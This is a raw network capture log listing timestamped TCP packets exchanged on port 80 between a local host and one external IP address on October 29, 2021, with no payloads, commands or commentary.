Oct 29, 2021 20:50:19.812835932 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812877893 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812901020 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812923908 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812923908 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812946081 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812967062 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.812978983 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.812990904 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.813010931 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.813052893 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855276108 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855314016 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855340004 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855365038 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855389118 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855395079 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855412006 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855426073 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855437994 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855459929 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855463028 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855489016 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855513096 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855535984 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855539083 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855559111 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855565071 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855592012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855602980 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855616093 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855639935 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855664968 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855685949 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855688095 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855704069 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855715990 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855741024 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855767965 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855787992 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855792046 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855813980 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855817080 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855842113 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855865002 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855887890 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855889082 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855909109 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855914116 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855937004 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855951071 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.855962992 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.855986118 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856010914 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856033087 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.856036901 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856057882 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.856062889 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856089115 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856102943 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.856112957 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856138945 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856163025 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856185913 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.856188059 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856215000 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.856215954 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856257915 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.856878996 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856908083 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856933117 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856956005 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.856971979 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.856981039 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857000113 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.857007027 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857032061 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857049942 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.857055902 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857080936 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857105017 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857130051 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.857131004 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857151031 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.857156038 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857180119 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857192993 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.857204914 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857229948 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857253075 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857271910 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.857275963 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857295990 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.857300997 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.857554913 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.859950066 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.859980106 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860003948 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860028982 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860053062 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860066891 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.860097885 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.860666037 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860693932 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860718966 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860723019 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.860743046 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860755920 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.860768080 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860793114 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860810995 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.860816956 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860843897 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860881090 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860907078 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860907078 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.860932112 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860954046 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.860958099 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860982895 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.860985994 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.861006975 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.861035109 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.861057997 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.861064911 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.861082077 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.861099005 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.861107111 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.861121893 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.861131907 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.861808062 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.861836910 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.861865044 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.861881018 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.861912966 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.862263918 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862288952 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862313032 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862339020 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862340927 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.862363100 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862365961 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.862391949 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862400055 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.862591028 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862615108 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862637043 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.862639904 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862664938 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862689972 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.862694979 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862720013 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862773895 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.862777948 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862802029 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862822056 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.862826109 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862850904 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.862873077 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.865761995 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.865788937 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.865808010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.865824938 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.865830898 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.865847111 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.865866899 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.865869999 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.865909100 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.866333961 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866358042 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866377115 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866399050 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866420031 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.866420984 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866442919 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866462946 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866463900 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.866482019 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866499901 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866518974 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.866520882 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866539955 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866548061 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.866559982 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866580009 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.866635084 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866662025 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866682053 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866681099 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.866705894 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866722107 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.866729975 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866751909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866769075 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.866856098 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866882086 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866904974 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.866925001 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.867049932 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.867077112 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.867098093 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.867263079 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.867285013 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.867305040 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.867326975 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.867347956 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.867352009 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.867367983 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.867377043 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.867387056 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.867410898 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.867413998 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.867432117 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.867469072 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.867980003 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868005991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868026972 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868047953 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868062973 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868067026 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868088007 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868103027 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868132114 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868191957 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868212938 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868235111 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868256092 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868269920 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868273973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868295908 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868311882 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868316889 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868338108 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868343115 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868357897 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868377924 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868386984 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868401051 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868422031 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868423939 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868446112 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868459940 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868464947 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868488073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868510962 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868518114 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868534088 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868556023 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868568897 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868577003 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868592024 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868601084 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868622065 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868623018 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868642092 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868663073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868683100 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868689060 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868700027 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868706942 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868729115 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868750095 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868753910 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868771076 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868793964 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868814945 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868814945 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868834019 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868868113 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868874073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868877888 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.868896008 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868916988 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.868957996 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.870518923 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.872335911 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.908461094 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908492088 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908514023 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908534050 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908554077 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908575058 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908596039 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908616066 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908623934 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.908651114 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.908910990 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908936024 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908957005 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908977985 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.908987999 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.908998966 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909018993 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909023046 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909041882 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909041882 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909066916 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909082890 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909087896 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909109116 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909132004 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909152031 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909153938 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909178019 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909182072 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909199953 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909213066 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909221888 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909240007 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909255981 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909270048 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909286976 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909303904 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909321070 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909336090 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909342051 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909363985 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909368038 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909384966 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909404993 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909409046 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909427881 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909440994 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909449100 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909470081 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909490108 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909509897 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909512043 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909532070 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909539938 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909554005 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.909570932 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.909574986 CEST	80	49855	185.98.87.159	192.168.2.4
